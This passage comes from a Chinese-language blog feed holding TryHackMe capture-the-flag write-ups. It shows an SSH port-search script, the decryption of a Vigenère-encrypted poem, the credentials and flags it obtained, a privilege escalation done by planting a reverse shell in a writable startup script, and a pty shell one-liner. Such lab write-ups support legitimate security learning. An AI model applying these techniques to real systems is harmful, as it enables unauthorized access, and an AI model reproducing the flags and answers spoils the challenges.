,13700,13702,13703,13704,13708,13706,13707,13709,13710,13705,13713,13711,13712,13722,13716,13714,13717,13725,13723,13720,13715,13727,13721,13724,13718,13726,13729,13728,13731,13719,13730,13732,13733,13734,13745,13738,13735,13740,13743,13741,13746,13744,13737,13739,13742,13736,13747,13748,13750,13754,13048,13752,13753,13749,13756,13043,13755,13751,13044,13047,13027,13757,13021,13019,13045,13038,13046,13028,13042,13026,13020,13039,13025,13041,13024,13022,13040,13023,13758,13759,13762,13760,13761,13766,13765,13763,13764,13767,13768,13772,13061,13059,13062,13060,13773,13774,13779,13780,13791,13792,13794,13793,13795,13800,13796,13799,13797,13801,13798,13802,13074,13808,13840,13809,13807,13075,13806,13823,13824,13839,13841,13842,13104,13106,13103,13105,13101,13102,13100,13099,13088,13098,13089,13090,13087,13844,13854,13853,13856,13851,13096,13094,13097,13095,13852,13850,13855,13857,13858,13863,13849,13865,13864,13866,13867,13868,13872,13871,13869,13870,13873,13874,13127,13134,13129,13132,13131,13118,13117,13122,13115,13135,13116,13133,13128,13111,13124,13123,13107,13121,13126,13130,13109,13119,13113,13120,13112,13114,13108,13110,13125,13144,13148,13146,13138,13142,13143,13145,13147,13137,13139,13136,13140,13141,13163,13875,13164,13162,13174,13878,13165,13170,13158,13167,13169,13173,13172,13175,13154,13166,13155,13161,13160,13157,13171,13168,13156,13159,13880,13879,13882,13883,13881,13885,13884,13887,13886,13892,13888,13890,13889,13891,13227,13232,13893,13234,13894,13233,13220,13228,13221,13224,13230,13231,13213,13212,13229,13223,13222,13214,13199,13204,13218,13215,13216,13225,13207,13217,13226,13208,13219,13205,13210,13206,13209,13193,13201,13200,13202,13198,13195,13211,13203,13185,13194,13189,13187,13184,13188,13197,13191,13192,13186,13196,13183,13190,13895,13179,13178,13181,13898,13896,13177,13180,13176,13182,13897,13899,13900,13906,13902,13901,13905,13904,13253,13251,13254,13907,13903,13252,13250,13908,13909,13910,13912,13911,13913,13914,13261,13915,13267,13274,13265,13916,13268,13273,13266,13917,13918,13919,13920,13921,13924,13925,13926,13923,13922,13928,13930,13927,13931,13932,13933,13929,13934,13935,13936,13938,13939,13941,13937,13942,13943,13940,13944,13945,13946,13947,13948,13951,13949,13950,13952,13953,13954,13955,13956,13957,13958,13959,13962,13960,13961,13963,13966,13968,13964,13965,13967,13972,13969,13971,13973,13979,13970,13977,13975,13981,13974,13978,13982,13980,13983,13984,13987,13986,13988,13976,13985,13989,13990,13993,13991,13992,13994,13997,13998,13995,13996,13999,13487,13489,13490,13486,13484,13488,13491,13485,13483,13494,13495,13492,13493,13778,13775,13770,13769,13777,13787,13789,13771,13783,13788,13784,13776,13790,13781,13782,13786,13785,13834,13833,13837,13825,13838,13835,13822,13836,13832,13820,13817,13829,13827,13828,13814,13803,13830,13831,13821,13826,13815,13819,13805,13818,13811,13804,13816,13813,13810,13812,13862,13861,13848,13860,13859,13847,13845,13843,13846,13877,13876 10.10.150.136&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6164b-vOfDDJM.png"&gt;發現 nmap 結果都一樣&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5a88c-y3RVGXZ.png"&gt;- 9100 ~ 9107 好像不太一樣&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cf04c-KTylHNo.png"&gt;&lt;/li&gt;
&lt;li&gt;但實際連上去看起來還是一樣的直接用 ssh 連線- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/38190-LfyLhep.png"&gt;&lt;/li&gt;
&lt;li&gt;他跟我說了一個 Lower&lt;/li&gt;
&lt;li&gt;輸入比較大的數字又跟我說 Higher我們可以計算一下 port 的最小跟最大值- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3479f-SRdgBpL.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;13999 - 9000 = 4999&lt;/code&gt;如果透過二分搜尋法的話， Worst case 是- &lt;code&gt;log2(13999 - 9000) = 1504&lt;/code&gt;發現他的 High Low 是反的&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; subprocess
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ip &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;10.10.150.136&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ports &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;open&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;ports.txt&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;read()&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;split(&lt;span style="color:#f1fa8c"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ports &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; [&lt;span style="color:#8be9fd;font-style:italic"&gt;int&lt;/span&gt;(i) &lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; ports]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ports&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;sort()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# port = ports[-1]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;l &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; ports[&lt;span style="color:#bd93f9"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; ports[&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;1&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;while&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;True&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; port &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;int&lt;/span&gt;((l&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;r)&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;f&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;L=&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;{&lt;/span&gt;l&lt;span style="color:#f1fa8c"&gt;}&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt; , R=&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;{&lt;/span&gt;r&lt;span style="color:#f1fa8c"&gt;}&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; process &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; subprocess&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;Popen([&lt;span style="color:#f1fa8c"&gt;&amp;#39;ssh&amp;#39;&lt;/span&gt;, &lt;span style="color:#f1fa8c"&gt;&amp;#39;-o&amp;#39;&lt;/span&gt; , &lt;span style="color:#f1fa8c"&gt;&amp;#39;StrictHostKeyChecking=no&amp;#39;&lt;/span&gt; , &lt;span style="color:#8be9fd;font-style:italic"&gt;str&lt;/span&gt;(ip) , &lt;span style="color:#f1fa8c"&gt;&amp;#39;-p&amp;#39;&lt;/span&gt; , &lt;span style="color:#8be9fd;font-style:italic"&gt;str&lt;/span&gt;(port)], stdout&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;subprocess&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;PIPE, stderr&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;subprocess&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;PIPE)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; out, err &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; process&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;communicate()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(port , out)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; out &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;b&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;Lower&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\r\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#6272a4"&gt;# r = port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; l &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; port
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;elif&lt;/span&gt; out &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;b&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;Higher&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\r\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#6272a4"&gt;# l = port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; port
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;!!!!!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;break&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;爆出結果是 9934&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a41a0-jMVEjqy.png"&gt;上面出現一堆的亂碼- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b654d-hLu4VRV.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;You&amp;#39;ve found the real service.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Solve the challenge to get access to the box
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Jabberwocky
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Mdes mgplmmz, cvs alv lsmtsn aowil
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Fqs ncix hrd rxtbmi bp bwl arul;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Elw bpmtc pgzt alv uvvordcet,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Egf bwl qffl vaewz ovxztiql.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Fvphve ewl Jbfugzlvgb, ff woy!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Bplhrf xag Rjinlu imro, pud tlnp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Bwl jintmofh Iaohxtachxta!&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Oi tzdr hjw oqzehp jpvvd tc oaoh:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Hv rfwmgl wl fp moi Tfbaun xkgm,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Puh jmvsd lloimi bp bwvyxaa.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Eno pz io yyhqho xyhbkhe wl sushf,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Pud cykdttk ej ba gaxt!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Ewl vpvict qseux dine huidoxt-achgb!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Al peqi pt eitf, ick azmo mtd wlae
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Lx ymca krebqpsxug cevm.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Ick lrla xhzj zlbmg vpt Qesulvwzrr?
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Cpqx vw bf eifz, qy mthmjwa dwn!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;V jitinofh kaz! Gtntdvl! Ttspaj!&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Wl ciskvttk me apw jzn.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Awbw utqasmx, tuh tst zljxaa bdcij
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Wph gjgl aoh zkuqsi zg ale hpie;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Bpe oqbzc nxyi tst iosszqdtz,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Eew ale xdte semja dbxxkhfe.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Jdbr tivtmi pw sxderpIoeKeudmgdstd
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;看起來是 jabberwocky 的詩，透過某種方法進行編碼/加密https://www.poetryfoundation.org/poems/42916/jabberwocky分析密文- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/eb1de-jOp5mLp.png"&gt;&lt;/li&gt;
&lt;li&gt;推測可能是 &lt;code&gt;Chaocipher&lt;/code&gt; 或 &lt;code&gt;Vigenere Cipher&lt;/code&gt;透過網站爆破- &lt;a href="https://www.boxentriq.com/code-breaking/vigenere-cipher"&gt;https://www.boxentriq.com/code-breaking/vigenere-cipher&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/638ac-EK1a9ti.png"&gt;&lt;/li&gt;
&lt;li&gt;炸出了結果&lt;code&gt;twas brillig and the slithy toves did gyre and gimble in the wabe all mimsy were the borogoves and the mome raths outgrabe beware the jabberwock my son the jaws that bite the claws that catch beware the jubjub bird and shun the frumious bandersnatch he took his vorpal sword in hand long time the manxome foe he sought so rested he by the tumtum tree and stood awhile in thought and as in uffish thought he stood the jabberwock with eyes of flame came whiffling through the tulgey wood and burbled a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/887a3-8WX8jpS.png"&gt;key 為 &lt;code&gt;thealphabetcipher&lt;/code&gt;透過廚師正式解碼- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2b1e4-x3EQ1uP.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Twas brillig, and the slithy toves
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Did gyre and gimble in the wabe;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;All mimsy were the borogoves,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;And the mome raths outgrabe.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Beware the Jabberwock, my son!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The jaws that bite, the claws that catch!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Beware the Jubjub bird, and shun
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The frumious Bandersnatch!&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;He took his vorpal sword in hand:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Long time the manxome foe he sought--
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;So rested he by the Tumtum tree,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;And stood awhile in thought.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;And as in uffish thought he stood,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The Jabberwock, with eyes of flame,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Came whiffling through the tulgey wood,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;And burbled as it came!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;One, two! One, two! And through and through
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;The vorpal blade went snicker-snack!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;He left it dead, and with its head
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;He went galumphing back.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;And hast thou slain the Jabberwock?
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Come to my arms, my beamish boy!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;O frabjous day! Callooh! Callay!&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;He chortled in his joy.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;#39;Twas brillig, and the slithy toves
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Did gyre and gimble in the wabe;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;All mimsy were the borogoves,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;And the mome raths outgrabe.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Your secret is bewareTheJabberwock
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;看到了 secret 為 &lt;code&gt;bewareTheJabberwock&lt;/code&gt;輸入後 &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7c63f-5Mel3q2.png"&gt;&lt;/li&gt;
&lt;li&gt;取得了一組帳號密碼&lt;code&gt;jabberwock&lt;/code&gt;:&lt;code&gt;ThankedDrownedSpeakWishing&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;可以正常連上&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c3d32-RJnH72A.png"&gt;取得 User Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/53303-0vwOApL.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;}32a911966cab2d643f5d57d9e0173d56{mht&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看起來是字串反轉&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/22556-CZaqehm.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;thm{65d3710e9d75d5f346d2bac669119a23}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/aa648-rjXn67j.png"&gt;準備豌豆- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a67cc-6mlHnJO.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/584b0-nA1r8tC.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/71c75-oKhL743.png"&gt;sudo 版本怪怪ㄉ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6f9f2-mefh9q6.png"&gt;- 檔案系統可能怪怪ㄉ發現重新開機會用 &lt;code&gt;jabberwock&lt;/code&gt; 使用者執行腳本- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/72d3a-uWcPoQ7.png"&gt;而這個腳本我們可寫- 寫一個 reverse shell 然後重開機&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d1cd0-5JDJ3uF.png"&gt;重新開機後順利收到 shell- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/eca9b-cAc5mZ7.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;python3 -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f3b73-KhkZZf1.png"&gt;觀察家目錄的檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d5742-wVyiANE.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;看起來是一堆的 hash&lt;/p&gt;</description></item><item><title>Bounty Hacker (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/19/bounty-hacker-try-hack-me-writeup/</link><pubDate>Thu, 19 Aug 2021 23:57:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/19/bounty-hacker-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/cowboyhacker"&gt;https://tryhackme.com/room/cowboyhacker&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.164.54&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.164.54 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/51e90-OHdpHys.png"&gt;&lt;/li&gt;
